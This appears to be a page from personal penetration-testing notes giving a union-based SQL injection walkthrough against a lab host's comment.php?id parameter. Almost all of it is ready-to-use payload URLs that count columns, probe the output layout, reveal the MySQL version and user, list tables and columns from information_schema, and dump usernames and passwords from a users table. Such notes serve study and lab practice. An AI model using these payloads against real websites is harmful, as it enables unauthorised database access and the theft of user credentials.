SQL

Enumerate the number of columns

e.g.

http://10.11.15.64/comment.php?id=735 order by 7

http://10.11.15.64/comment.php?id=735%20order%20by%207

  • from this we can determine that there are 6 columns here

Understanding the layout of the output

e.g.

http://10.11.15.64/comment.php?id=735 union select all 1,2,3,4,5,6

http://10.11.15.64/comment.php?id=735%20union%20select%20all%201,2,3,4,5,6

  • The SQL UNION statement requires all of the columns to be specified (no more and no less)

  • e.g. this would fail

http://10.11.15.64/comment.php?id=735 union select all 1,2,3,4,5

Extracting data from the database

Discover the version of MySQL in use:

http://10.11.15.64/comment.php?id=735 union all select 1,2,3,4,@@version,6

Discover the current user being used for the database connection

http://10.11.15.64/comment.php?id=735 union all select 1,2,3,4,user(),6

Tables

http://10.11.15.64/comment.php?id=735 union all select 1,2,3,4,table_name,6 FROM information_schema.tables

Columns

http://10.11.15.64/comment.php?id=735 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'

Usernames and passwords

http://10.11.15.64/comment.php?id=735 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users

PreviousWinRMNextActive Directory Enum - brief

Last updated